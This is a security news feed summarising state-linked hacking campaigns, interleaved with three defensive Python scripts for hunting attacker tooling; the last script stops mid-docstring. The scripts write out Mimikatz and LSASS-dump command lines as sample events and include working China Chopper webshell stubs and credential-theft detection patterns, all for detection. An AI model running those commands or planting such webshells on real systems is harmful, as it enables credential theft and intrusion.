Information Security News | Cyber Security | Hacking Tutorial (Information Security Newspaper | Infosec Articles | Hacking News), https://www.securitynewspaper.com/, last updated Thu, 09 Jun 2022 22:34:57 +0000

Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013
https://www.securitynewspaper.com/2022/06/09/education-and-telecommunication-organizations-based-in-singapore-hong-kong-vietnam-cambodia-and-australia-were-being-spied-on-since-2013/
Thu, 09 Jun 2022 22:34:54 +0000

The post Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013 appeared first on Information Security Newspaper | Hacking News.

Researchers at security firm SentinelLabs report the detection of a new Chinese-speaking hacking group, identified as Aoqin Dragon, that has been active since 2013. According to the researchers, the group focuses on cyber espionage against government, educational and telecommunications organizations in Australia, Hong Kong, Singapore, and Vietnam.

The main attack method employed by this group between 2012 and 2015 involved Microsoft Office documents specially crafted to exploit known vulnerabilities such as CVE-2012-0158 and CVE-2010-3333. This tactic was first observed in 2014, in a phishing campaign associated with the Advanced Persistent Threat (APT) operation known as Naikon.

SentinelLabs identified a second method associated with Aoqin Dragon: disguising malicious executables with the icons of fake antivirus products. Once run, these executables dropped a malware sample on the affected system.

Starting in 2018, the group abandoned these tactics in favor of a removable-disk shortcut file; clicking the shortcut triggers a DLL hijack that loads an encrypted payload and delivers a backdoor. The malware runs under the name “Evernote Tray Application” and executes at system startup; if any removable drives are detected, a copy of the payload is written to them to spread the infection.

SOURCE: SentinelLabs

At least two backdoor variants used by this group have been identified. The first, known as Mongall, is a DLL injected into memory, protected with encryption and continuously maintained since its launch in 2013. It profiles the host and sends the details to the C&C server over an encrypted channel.

The second, Heyoka, is an open source exfiltration tool that uses spoofed DNS requests to build a two-way communication tunnel. The group uses Heyoka to copy files off compromised devices, which helps keep administrators from noticing the malicious activity in its early stages.

Aoqin Dragon is an unusual case, having gone unnoticed for almost ten years. This was possible because of the continuous evolution of its strategies and its periodic changes of tactics, so it is highly likely that the group will change its behavior again in the near future.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

How hackers took control of 100 email accounts of employees of RT and other Russian organizations for cyber spying purposes?
https://www.securitynewspaper.com/2022/05/25/how-hackers-took-control-of-100-email-accounts-of-employees-of-rt-and-other-russian-organizations-for-cyber-spying-purposes/
Wed, 25 May 2022 18:20:22 +0000

A recent investigation details how an unidentified hacking group compromised the email accounts of entities linked to the Russian government through four separate phishing operations in early 2022. According to Malwarebytes experts, the attackers use a remote access Trojan (RAT) to spy on infected systems and execute commands on them, while deploying various mechanisms to evade detection and hinder reverse engineering.

After extensive sample collection, analysis and follow-up, the researchers uncovered some details about this RAT. While these phishing campaigns have not been attributed to a specific threat actor, all indications are that the operation is run by a Chinese Advanced Persistent Threat (APT) group.

Simultaneous operations

As mentioned above, the hackers have run four malicious email campaigns since the end of February, operating them simultaneously and using various lures to attract unsuspecting users.

Below, we’ll briefly review the features of each phishing attack based on evidence collected by Malwarebytes.

Interactive map

The hackers began distributing the RAT in a file named interactive_map_UA.exe, supposedly an interactive map of Ukraine. Distribution started a few days after Russia invaded Ukraine, indicating that the hackers sought to exploit the international conflict.

Update for Log4j

Another of the detected campaigns uses a fake update for the Log4Shell vulnerability, delivered as a tar file named Patch_Log4j.tar.gz. Reports of these emails began in March; they targeted at least 100 employees of RT TV, a media network funded by Russia’s government.

The messages appear to be sent by the Russian state defense conglomerate Rostec and include various images and PDFs to make them look less suspicious.

The attached PDF, named О кибербезопасности 3.1.2022.pdf, contains instructions on how to run the fake patch, plus a bullet list with supposed safety tips.

Among these recommendations, the hackers even added a link to VirusTotal showing that the file had not been flagged as malicious by any antivirus engine.

The message also includes links to the rostec.digital website, registered by the threat actors and designed to resemble Rostec’s actual site. Interestingly, the fraudulent website was registered in mid-2021, months before the Russian invasion of Ukraine began.

Rostec

The third campaign again uses Rostec’s image, distributing a malicious file named build_rosteh4.exe.

Fake job offers

The latest detected campaign uses a Word document containing an alleged job offer at the state oil company Saudi Aramco. The attack involves a self-extracting file that uses the Jitsi icon and creates a directory named Aramco in C:\ProgramData.

The document, written in English, includes a message in Russian asking the user to enable macros on their device.

Remote template injection then downloads a macro-enabled template, whose macro drops a VBS script named HelpCenterUpdater.vbs into the %USER%\Documents\AdobeHelpCenter directory. The template also checks for the existence of %USER%\Documents\D5yrqBxW.txt; as long as that file exists, the script is delivered and executed.

The HelpCenterUpdater.vbs script drops another obfuscated VBS file named UpdateRunner.vbs and downloads the primary payload, a DLL called GE40BRmRLP.dll, from the C&C server. In another related payload the script delivers an EXE instead of a DLL, although the two appear to share code.

The UpdateRunner.vbs script is responsible for running the DLL through rundll32.exe.

The malicious DLL contains the code that communicates with the C&C server and executes the received commands.

The campaign is still active and relatively successful, although many details remain unknown and it is difficult to determine what specific goals the attackers are pursuing. Malwarebytes has committed to continue monitoring this campaign and the malware it uses.

How Chinese cyber army steals intellectual property from your company
https://www.securitynewspaper.com/2022/05/05/how-chinese-cyber-army-steals-intellectual-property-from-your-company/
Thu, 05 May 2022 23:04:37 +0000

Cybersecurity specialists from tech firm Cybereason reported the uncovering of a Chinese cybercriminal operation whose main goal was intellectual property theft. Identified as “Operation Cuckoobees”, the campaign was attributed to a China-sponsored advanced persistent threat (APT) group known as Winnti, APT41, Barium or Blackfly.

This group is known for using various malware strains and distributing them through complex attack chains. According to the Cybereason report, it all starts with the exploitation of multiple vulnerabilities in an enterprise resource planning tool. The hackers then look for a file named gthread-3.6.dll in the VMware Tools folder, which they use to inject further payloads such as webshells and credential-dumping tools.

The threat actors also strive to hide their activity. Among the techniques used by APT41, the abuse of the Windows Server Common Log File System (CLFS) stands out: CLFS uses an undocumented file format that can be accessed through APIs but is not readily analyzed, allowing the hackers to hide their malicious payloads and bypass detection for years. “The attackers stole intellectual property such as confidential documents, blueprints, diagrams, formulas and proprietary data related to the manufacturing industry.”

The researchers add that the attacks targeted technology and manufacturing companies, especially in East Asia, Western Europe and North America, all considered global industrial hotspots.

Industrial espionage is a practice commonly associated with hacking groups sponsored by China and its all-powerful Communist Party. In the past, the United States and other nation-states have accused the Asian giant of facilitating cyberattack campaigns for the theft of confidential records, either by financing their activities or simply by turning a blind eye to these groups and operations.

Five individuals arrested for the hacking and millionaire theft from a cryptocurrency exchange platform
https://www.securitynewspaper.com/2022/02/23/five-individuals-arrested-for-the-hacking-and-millionaire-theft-from-a-cryptocurrency-exchange-platform/
Thu, 24 Feb 2022 00:25:19 +0000

Spanish authorities announced the arrest of five people accused of hacking a cryptocurrency exchange company, an incident that resulted in the theft of more than €6 million. This is the first case of cryptocurrency fraud that Spanish police have solved.

Reports suggest that the hackers behind this operation used a sophisticated remote access Trojan (RAT) variant, which allowed them to move laterally through the affected company’s networks. The characteristics of the attack indicate that an advanced persistent threat (APT) group could be behind the incident.

Investigators also believe it all may have started with an employee of the company downloading a pirated movie from an insecure website. The file contained a malicious payload that allowed the hackers to take full control of the compromised networks. The download reportedly took place more than half a year before the attack, giving the attackers time to learn the platform’s internal processes in detail and prepare the final intrusion.

The stolen cryptocurrencies were transferred to digital wallets controlled by the hackers, who waited up to six months before continuing the operation so as not to attract attention. Once that period had passed, they began carrying out multiple digital money laundering transactions.

In addition to the five arrested, agents also identified the alleged operator of the illegal download website from which the malware that triggered the attack was distributed and four other individuals who would have received part of the stolen assets.

Once authorities had sufficient grounds, they obtained search warrants for four homes in the provinces of Tenerife, Bilbao and Barcelona, where four of the suspects were arrested and thousands of dollars in cash, electronic devices and several cryptocurrency wallets were seized. Just this week, in the latest phase of the operation, another person who supervised the fraudulent scheme was placed under investigation.

The maximum penalty these individuals could reach if convicted is still unknown.

APT group TA2541 has been targeting thousands of organizations across aviation, aerospace, transportation, manufacturing, and defense industries worldwide
https://www.securitynewspaper.com/2022/02/15/apt-group-ta2541-has-been-targeting-thousands-of-organizations-across-aviation-aerospace-transportation-manufacturing-and-defense-industries-worldwide/
Tue, 15 Feb 2022 19:39:30 +0000

A report by security firm Proofpoint details the finding of a hacking campaign that employs phishing and social engineering tactics to distribute a dangerous remote access Trojan (RAT) variant on compromised systems. According to the report, the operation is run by TA2541, a hacking group first detected in 2017 that has been threatening critical infrastructure around the world.

Unlike other similar groups, TA2541 does not usually use current events, topics of general interest or false promotions to attract potential victims. Instead, this group draws on topics related to transportation, aviation, commercial flights, tourism, and the airline industry in general. This campaign has been detected in countries in North America, Europe, Asia and the Middle East.

Below we can see an example of the emails sent by these hackers:

Proofpoint researchers found that the emails used by this group contained a Google Drive URL that redirected affected users to an obfuscated Visual Basic Script (VBS) file; when executed, the script retrieves an executable stored as text on platforms such as Pastetext or GitHub.

The hackers run PowerShell in various Windows processes and query Windows Management Instrumentation (WMI) to look for security products on the affected system and attempt to disable them. Finally, they collect information from the affected system before installing the RAT.

In addition to Google Drive, the threat actors also use Discord links that lead users to compressed files containing AgentTesla or Imminent Monitor. TA2541 has also resorted to email attachments with embedded executables that contain the malicious URL.

VBS files are used to maintain persistence for an AsyncRAT payload by adding a VBS file to the home directory that points to a PowerShell script.

The researchers also report that TA2541 has used more than a dozen different malware payloads since it emerged on the cybercriminal scene. The group has always relied on commodity malware available for sale on criminal forums or in code repositories. While it currently uses mainly AsyncRAT, it has also used other variants such as NetWire, Parallax and WSH RAT.

Given the characteristics of the malware variants used by this group, the researchers believe that these campaigns have as their main purpose the collection of information and remote access to infected systems. However, the researchers have not been able to confirm what the real goals of this group are.

This group has been a constant threat for the past few years and is highly likely to remain so in the medium term, so system administrators will need to stay alert to any potential attack attempts related to TA2541.

BlueNoroff APT that hacked Bangladesh Bank is now only focusing on hacking cryptocurrency businesses and exchanges
https://www.securitynewspaper.com/2022/01/17/bluenoroff-apt-that-hacked-bangladesh-bank-is-now-only-focusing-on-hacking-cryptocurrency-businesses-and-exchanges/
Tue, 18 Jan 2022 00:08:08 +0000

For almost five years, SecureList researchers have been tracking an Advanced Persistent Threat (APT) group apparently linked to the infamous Lazarus Group and, unlike other similar groups, driven by obvious financial motives, as seen in the Bangladesh Central Bank attack of 2016. Dubbed BlueNoroff, the group has a huge malicious arsenal, including malware variants, exploits for all sorts of known vulnerabilities and a large infrastructure at its disposal, and has consistently targeted banking networks and electronic transfer systems.

The most recent hacking operation linked to BlueNoroff was identified at the end of 2021 and seems to show that the group has changed targets, this time focusing on compromising cryptocurrency exchange platforms through their unsuspecting users.

For months, BlueNoroff operators closely analyzed a number of virtual asset startups in order to build a detailed map of the interactions between users and platforms, then launched an unprecedented social engineering campaign that abuses the trust previously established between the parties involved in cryptocurrency processes.

The researchers note that these attacks could start with a simple notification of a document shared from the Google Drive account of a friend, co-worker or teammate:

In the example above, we can see an “X” in place of an image that could not be loaded because the email was opened on an offline system. Had the system been connected to the internet, the actual Google document icon would have been loaded from a third-party tracking server, immediately notifying the attacker that the potential victim had opened the malicious email.

Another variant of the same attack involves an email forwarded between different users. This variant is more advantageous for the hackers, since the original email and the forwarded content appear to have already been vetted by some email security mechanism.

Although the SecureList example does not show the address of the person forwarding the malicious email, because it belongs to a real victim, the web address “sendgrid.net” is visible in the text. Although no such site exists as such, it may be associated with SendGrid, an email marketing firm that claims to send 90 billion emails every month.

Since SendGrid is a legitimate business, Gmail accepts its customized MIME headers, which in turn allows legitimate-looking emails to be forged. In this case, the hackers spoof communications from the board of directors of Digital Currency Group, a venture capital firm that focuses on the digital currency market.

In addition to Digital Currency Group, BlueNoroff hackers are posing as partners or executives of firms such as Beenos, CoinSquad, Emurgo, Youbi Capital, Global Brain, CoinBig and Secure Digital Markets, as well as other related startups.

In some cases analyzed, hackers have also used compromised accounts on LinkedIn to establish contact with potential victims. This approach allows attackers to operate without drawing too much attention with massive spam campaigns or exploiting dangerous vulnerabilities, keeping a low profile until it’s time to actually attack.

This is not to say that vulnerabilities are never exploited in the process. BlueNoroff usually relies on exploiting CVE-2017-0199 for the automatic execution of a remote script linked to a weaponized document. A sufficiently trained user could detect suspicious activity, although the attack is highly evasive.

As another layer of evasion, if the document is opened in an offline environment, the target user only sees informative content on topics related to the lure, possibly taken from trusted sources.

When the document’s full content is displayed, a remote template that is itself another macro-enabled document is fetched and shown to the target user; the combination of the two documents is critical to the attack.

The first document contains two base64-encoded binary objects declared as image data, while the remote template contains a VBA macro that extracts one of these objects and spawns a new notepad.exe process into which it injects and executes the binary code. Although these binaries are labeled as JPEG files, they are actually PE files with modified headers.

Successful execution of this content installs a malware variant capable of intercepting all kinds of information, including cryptocurrency addresses, access credentials and other data, which constitutes the final stage of the attack.

The exact scope of the attack is currently unknown, although the malicious emails are believed to have been sent to a few thousand users around the world, which could be disastrous for cryptocurrency enthusiasts.

How Microsoft counter attacked the infrastructure used by Chinese military hackers
https://www.securitynewspaper.com/2021/12/07/how-microsoft-counter-attacked-the-infrastructure-used-by-chinese-military-hackers/
Tue, 07 Dec 2021 22:06:37 +0000

As part of an ambitious security effort, Microsoft took control of dozens of malicious sites allegedly operated by Nickel, a China-based hacking group. Apparently, these platforms were used to direct attacks against critical infrastructure in the United States and at least 28 other countries, mainly in Latin America and Europe.

Tom Burt, Vice President of Customer Security and Trust at Microsoft, said, “Nickel has focused its efforts on public and private organizations, including diplomatic entities and foreign ministries in North America, Central America, South America, the Caribbean, Europe and Africa.”

The tech giant was able to take down the hackers’ infrastructure after a U.S. court issued an order based on the group’s actions. The order directs that the malicious websites be redirected to secure servers by changing their authoritative name servers to NS104a.microsoftinternetsafety.net and NS104b.microsoftinternetsafety.net.

SOURCE: Microsoft

Microsoft’s security teams first detected the malicious behavior in 2016, while security firms such as Mandiant date Nickel’s existence back to 2010. For a couple of years the group’s presence was also detected in attacks against European and Latin American countries, mainly in malware delivery campaigns aimed at network monitoring and data theft.

Nickel’s operations are funded by the Chinese government and rely on previously compromised third-party VPN platforms, credentials stolen in phishing campaigns, and exploits targeting unpatched Exchange Server and SharePoint servers.

Since the investigation began, 24 criminal cases have been filed against these hackers and five against their sponsors, in addition to the removal of nearly 10,000 malicious websites and the blocking of more than 500,000 online platforms potentially associated with this operation.

Microsoft has made considerable efforts in the fight against cybercrime. A few months ago, the company seized the computing infrastructure of the Necurs botnet, used by threat actors to distribute malware payloads and putting millions of devices around the world at risk. According to Microsoft, at its peak Necurs was able to reach more than 40 million targets in less than two months.

How Chinese APT hackers stole Lockheed Martin F-35 fighter plane to develop its own J-20 stealth fighter aircraft [VIDEO]
https://www.securitynewspaper.com/2021/08/23/how-chinese-apt-hackers-stole-lockheed-martin-f-35-fighter-plane-to-develop-its-own-j-20-stealth-fighter-aircraft-video/
Mon, 23 Aug 2021 23:10:26 +0000

According to a recent security report, the Chinese government has resorted to hacking, cyberwarfare and corporate espionage tactics to boost its ambitious defense program, compromising the systems of firms such as Lockheed Martin in order to access classified information useful for its own purposes.

Peter Suciu, a renowned researcher, says China is an actor that should be taken seriously, especially on military issues. This is not the first such report: since 2019 the Pentagon has accused the Chinese military of resorting to what it calls “cyber theft” and other methods to achieve major military advances.

It all goes back to 2007, when Lockheed Martin discovered that a Chinese hacking group had been stealing technical documents related to the F-35 program; a similar theft occurred when cybercriminals working for Beijing compromised a network belonging to an Australian subcontractor on the F-35.

These reports lead experts to believe that the Chinese have acquired a wealth of crucial information and data for these programs, including the development of the Chinese J-20 fighter jet, also known as “Mighty Dragon.” Suciu himself claims that the creation of these aircraft would have been impossible without the information stolen from Lockheed Martin.

In connection with these reports, Business Insider published a report detailing the clear similarities in appearance and engineering between American aircraft and those created by the Chinese government. In addition, the report not only emphasizes the similarity of these aircraft, but also states that the sensor systems used by the Chinese government are virtually identical to the electro-optical guidance employed by Lockheed Martin in the Lightning II model, further evidence of espionage against the company.

Chinese cybercriminals attack electric companies, water treatment plants and more critical infrastructure
https://www.securitynewspaper.com/2021/08/05/chinese-cybercriminals-attack-electric-companies-water-treatment-plants-and-more-critical-infrastructure/
Thu, 05 Aug 2021 20:47:10 +0000

A China-based group of threat actors is running an attack campaign against critical infrastructure in South Asia, compromising industrial control systems and extracting sensitive information. Attacks on critical infrastructure have become common practice for threat actors operating against these territories.

A Symantec report notes that its threat analysis division detected multiple attacks by a single group against four critical infrastructure organizations in a South Asian country that the researchers chose not to name. The operation appears to be aimed at intelligence gathering; it started in November 2020 and remained active until early 2021.

According to the report, the IP addresses, the malware used and the location of the victims all suggest that the four organizations were attacked by the same group. Some evidence points to operators based in China, but the researchers declined to attribute the campaign to a specific known group, at least for now.

Specifically, the hackers targeted a water company, an energy company, a communications company and a national defense organization. What information was stolen is not yet known; more may emerge once the affected computers have been carefully analyzed.

For example, in the attack on the water company, the hackers gained access to a machine used to design SCADA systems, suggesting an interest in those systems. At the power company, one of the infected devices was likewise used for engineering design.

The group also abused legitimate tools to achieve its goals, including Windows Management Instrumentation (WMI), ProcDump, PsExec, PAExec and Mimikatz. The attackers also abused a free media player for DLL hijacking and, possibly, Google Chrome Frame, a legitimate (since discontinued) Internet Explorer plugin.

Finally, the attackers used backdoors and keyloggers to steal credentials and other sensitive information.
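The tools listed above are all legitimate or dual-use, so the detection opportunity is in how they are invoked rather than in a file hash. The script below is an added example, not part of the Symantec report: it runs a handful of rules over Sysmon-style process-creation events (Event ID 1 fields Image, CommandLine, ParentImage). The events are constructed, rendered in a simplified "key=value | key=value" layout for readability; against real telemetry you would parse the EVTX/XML instead, since a command line can itself contain a pipe character. The rule names and regexes are this example's own.

```python
"""Flag living-off-the-land tooling (PsExec/PAExec, WMI, ProcDump, Mimikatz)
in Sysmon-style process-creation events.

Added example, not from the Symantec report. The events are a constructed,
simplified key=value rendering of Sysmon Event ID 1 fields; for real data,
parse the EVTX/XML instead of this " | " layout, since a command line may
itself contain a pipe character.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events: two benign, five showing the tools named in the report.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\svchost.exe | CommandLine=svchost.exe -k netsvcs | ParentImage=C:\\Windows\\System32\\services.exe",
    "Image=C:\\Windows\\PSEXESVC.exe | CommandLine=C:\\Windows\\PSEXESVC.exe | ParentImage=C:\\Windows\\System32\\services.exe",
    "Image=C:\\Windows\\PAExec-3412-SRV01.exe | CommandLine=\"C:\\Windows\\PAExec-3412-SRV01.exe\" -service | ParentImage=C:\\Windows\\System32\\services.exe",
    "Image=C:\\Windows\\System32\\cmd.exe | CommandLine=cmd.exe /c whoami | ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
    "Image=C:\\Users\\Public\\pd.exe | CommandLine=pd.exe -accepteula -ma lsass.exe C:\\Users\\Public\\ls.dmp | ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Users\\Public\\m.exe | CommandLine=m.exe privilege::debug sekurlsa::logonpasswords exit | ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Program Files\\Editor\\editor.exe | CommandLine=editor.exe notes.txt | ParentImage=C:\\Windows\\explorer.exe",
]

# (rule name, field to inspect, case-insensitive regex). Name-based rules catch
# the stock binaries; argument-based rules still fire when the tool is renamed.
RULES: List[Tuple[str, str, str]] = [
    ("psexec_service", "Image", r"\\PSEXESVC\.exe$"),
    ("paexec_service", "Image", r"\\PAExec-\d+-[^\\]+\.exe$"),
    ("wmi_spawned_process", "ParentImage", r"\\WmiPrvSE\.exe$"),
    ("procdump_binary", "Image", r"\\procdump(64)?\.exe$"),
    ("procdump_lsass", "CommandLine", r"(^|\s)-ma\s+lsass(\.exe)?\b"),
    ("mimikatz_module", "CommandLine", r"\b(sekurlsa|lsadump|kerberos|privilege)::"),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value | key=value' line into a field dict."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def detect(events: List[str]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that matches an event."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(events):
        ev = parse_event(line)
        for name, field, pattern in RULES:
            if re.search(pattern, ev.get(field, ""), re.IGNORECASE):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {parse_event(SAMPLE_EVENTS[idx])['CommandLine']}")
```

Two caveats worth keeping in mind when adapting this: the renamed ProcDump (pd.exe) is caught only by the `-ma lsass` argument rule, which is why argument-based rules matter, and PsExec lets the operator pick the service name with `-r`, so the service-image rules should be paired with Service Control Manager 7045 (service install) events rather than relied on alone.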

Exposing Chinese hackers: how they’re hacking telecom companies and listening to your calls
https://www.securitynewspaper.com/2021/08/03/exposing-chinese-hackers-how-theyre-hacking-telecom-companies-and-listening-to-your-calls/ (Tue, 03 Aug 2021 16:26:34 +0000)

Researchers have discovered three distinct threat groups linked to the Chinese government using already-known Microsoft Exchange exploits to deploy powerful cyberattacks against telecommunications providers. The groups were identified as Emissary Panda (also known as APT27), Soft Cell and Naikon. Separately, Kaspersky researchers confirmed the detection of a fourth Chinese hacking group, known as GhostEmperor, that uses a rootkit to compromise Windows systems.

The report was prepared by security firm Cybereason and states that these groups work closely with the Chinese military. Researcher Yonatan Striem-Amit mentions that these attacks seem to be the starting point for ambitious espionage campaigns carried out by compromising personal devices.

The three groups have been tracked by the cybersecurity community for a couple of years, since one of them was caught attacking a South Asian telecommunications company. Only two of the three attributions are firm: the activity assigned to Emissary Panda rests on an OWA backdoor deployed on compromised IIS and Exchange servers, and other groups are known to use that backdoor as well.

Soft Cell, the research notes, gains access by exploiting known Exchange vulnerabilities to install the China Chopper webshell. The hackers then deploy the PcShare backdoor and Cobalt Strike for lateral movement, which eventually allows the theft of user credentials.

Naikon, for its part, uses the Nebulae backdoor to access compromised systems, PAExec and WMI for lateral movement, and a modified Mimikatz to dump credentials, alongside a keylogger that records keystrokes and intercepts other sensitive input.
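China Chopper is unusual among webshells in that the server-side component is a single eval() stub, which makes it a good candidate for content signatures, and every command the operator runs arrives as an HTTP POST to that file, which makes the web server log the natural place to pivot next. The script below is an added example, not Cybereason's tooling: it scans web content for the well-known ASPX and PHP stubs, then parses IIS W3C logs and counts POSTs per client IP to the flagged paths. The file contents, the directory paths and the log lines are constructed; the IP addresses come from the RFC 5737 documentation ranges.

```python
"""Hunt for China Chopper-style webshells on an Exchange/IIS host: match the
one-line eval() stubs in web content, then pivot into IIS W3C logs to see
which clients POSTed to the flagged paths.

Added example, not from the Cybereason report. File contents, paths and log
lines are constructed; IPs are from the RFC 5737 documentation ranges.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Set, Tuple

# Server-side stubs China Chopper is known to use: a bare eval() over a
# request parameter whose name doubles as the operator's password.
SHELL_SIGNATURES = [
    ("aspx_jscript_eval", re.compile(r'eval\(\s*Request\.Item\[[^\]]+\]\s*,\s*"unsafe"\s*\)', re.I)),
    ("php_eval_request", re.compile(r"@?eval\(\s*\$_(POST|REQUEST|GET)\[[^\]]+\]\s*\)", re.I)),
]

# Constructed webroot: one legitimate page and two dropped shells, keyed by URL path.
WEBROOT_FILES: Dict[str, str] = {
    "/owa/auth/logon.aspx": '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
    "/aspnet_client/system_web/error.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "/owa/auth/current/themes/resources/x.php": "<?php @eval($_POST['cmd']); ?>",
}

# Constructed IIS W3C extended log. IIS writes '+' for spaces inside the User-Agent.
IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query s-port cs-username cs(User-Agent) sc-status
2021-03-04 02:11:07 198.51.100.23 POST /aspnet_client/system_web/error.aspx - 443 - python-requests/2.25.1 200
2021-03-04 02:11:09 198.51.100.23 POST /aspnet_client/system_web/error.aspx - 443 - python-requests/2.25.1 200
2021-03-04 02:12:44 203.0.113.9 POST /aspnet_client/system_web/error.aspx - 443 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200
2021-03-04 02:13:01 192.0.2.15 GET /owa/auth/logon.aspx - 443 - Mozilla/5.0+(Windows+NT+10.0) 200
2021-03-04 02:15:30 198.51.100.23 POST /owa/auth/current/themes/resources/x.php - 443 - python-requests/2.25.1 200
""".splitlines()


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {path: [signature names]} for every file matching a stub pattern."""
    hits: Dict[str, List[str]] = {}
    for path, content in files.items():
        names = [name for name, pat in SHELL_SIGNATURES if pat.search(content)]
        if names:
            hits[path] = names
    return hits


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse IIS W3C log lines, taking column names from the #Fields: directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def pivot_posts(records: List[Dict[str, str]], flagged_paths: Set[str]) -> Counter:
    """Count POST requests per (client IP, path) for paths the file scan flagged."""
    counts: Counter = Counter()
    for rec in records:
        stem = rec.get("cs-uri-stem", "").lower()
        if rec.get("cs-method") == "POST" and stem in flagged_paths:
            counts[(rec["c-ip"], stem)] += 1
    return counts


def hunt(files: Dict[str, str], log_lines: Iterable[str]) -> Tuple[Dict[str, List[str]], Counter]:
    """Full workflow: find shells on disk, then attribute activity from the logs."""
    hits = scan_files(files)
    counts = pivot_posts(parse_w3c(log_lines), {p.lower() for p in hits})
    return hits, counts


if __name__ == "__main__":
    shells, activity = hunt(WEBROOT_FILES, IIS_LOG)
    for path, names in shells.items():
        print(f"webshell {path}: {', '.join(names)}")
    for (ip, path), n in activity.most_common():
        print(f"{n:3d} POSTs from {ip} to {path}")
```

The log pivot is the part that turns a cleanup into an investigation: the operator IPs and user agents it surfaces feed straight into a search across the rest of the estate, and the first POST timestamp bounds when the shell went live. Run the file scan against a copy of the webroot taken from the host, not through the compromised IIS instance itself.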

Finally, the third group uses Exchange Server for initial access and has deployed its custom .NET backdoor on more than 20 servers over the past three years. All of these intrusions were fully operational and were carried out within a very short period, showing the advanced capabilities of the groups involved.

For the researchers it was unusual that three different groups ran campaigns in an almost coordinated way, even compromising the same targets simultaneously. That makes it difficult to conclude whether the groups act jointly or independently, although the report states that all three work closely with the Chinese military.

“These attacks are worrisome as they compromise the security of critical infrastructure and its suppliers. Espionage operations sponsored by state actors not only have a negative impact on trading partners, but also have the potential to threaten national security in affected territories,” the report concludes.

These 13 malware variants are used to hack and take control of Pulse Secure devices. Make sure your antivirus can detect them
https://www.securitynewspaper.com/2021/07/22/these-13-malware-variants-are-used-to-hack-and-take-control-of-pulse-secure-devices-make-sure-your-antivirus-can-detect-them/ (Thu, 22 Jul 2021 16:20:54 +0000)

In its most recent report, the Cybersecurity and Infrastructure Security Agency (CISA) alerted users of Pulse Secure devices to the discovery of at least 13 malware samples found on compromised devices. These devices have been the target of repeated security incidents at private companies and government organizations in the U.S. since at least 2020.

The attacks are closely tied to the vulnerabilities tracked as CVE-2019-11510, CVE-2020-8260 and CVE-2021-22893, which give threat actors an initial foothold and let them plant webshells for backdoor access to the target system.

The agency published a detailed report on the 13 malware samples detected on the compromised devices so that IT administrators have the most updated information about this hacking campaign, its attack methods and indicators of compromise.

As noted above, all samples analyzed by CISA were found on Pulse Connect Secure devices and are mostly modified versions of legitimate scripts. These act as webshells that execute remote commands, giving the attackers persistence and remote access to the compromised appliance, among other capabilities.

One sample described in more detail is a modified version of DSUpgrade.pm, the Pulse Secure Perl module at the heart of the appliance's system update process. The attackers altered the file so that it executes arbitrary commands received remotely.

Among the legitimate Pulse Secure files modified by the hackers are:

  • licenseserverproto.cgi (STEADYPULSE)
  • tnchcupdate.cgi
  • healthcheck.cgi
  • compcheckjs.cgi
  • DSUpgrade.pm.current
  • DSUpgrade.pm.rollback
  • clear_log.sh (THINBLOOD LogWiper utility variant)
  • compcheckjava.cgi (HARDPULSE)
  • meeting_testjs.cgi (SLIGHTPULSE)
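Because the malware here is mostly legitimate scripts with extra code spliced in, antivirus signatures are a weak control; what actually exposes these implants is comparing the files on the appliance with a trusted copy of what the vendor shipped. The script below is an added example, not CISA's or the vendor's tooling: it builds a SHA-256 manifest from a trusted tree and reports files that were modified, added or removed in a suspect tree. The two trees are constructed stand-ins that borrow the file names from the list above; their contents and the directory layout are placeholders, not the real Pulse Connect Secure files.

```python
"""Verify an appliance's scripts against a known-good SHA-256 manifest and
report modified, added and missing files.

Added example, not CISA's or the vendor's tooling. The trees below are
constructed: the baseline stands in for a trusted copy of the shipped files,
the suspect tree for what was pulled from a device under investigation.
"""
import hashlib
import os
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(tree: Dict[str, bytes]) -> Dict[str, str]:
    """Map relative path -> SHA-256 for every file in a trusted tree."""
    return {path: sha256_hex(data) for path, data in tree.items()}


def verify_tree(manifest: Dict[str, str], tree: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Compare a suspect tree to the manifest.

    'modified' covers known paths whose hash changed (the spliced-in webshell
    case), 'added' covers paths the vendor never shipped, 'missing' covers
    shipped files that are gone (e.g. a log utility replaced or removed).
    """
    report: Dict[str, List[str]] = {"modified": [], "added": [], "missing": []}
    for path, data in tree.items():
        expected = manifest.get(path)
        if expected is None:
            report["added"].append(path)
        elif sha256_hex(data) != expected:
            report["modified"].append(path)
    for path in manifest:
        if path not in tree:
            report["missing"].append(path)
    for key in report:
        report[key].sort()
    return report


def load_tree(root: str) -> Dict[str, bytes]:
    """Read a real directory into the path -> bytes form used above.

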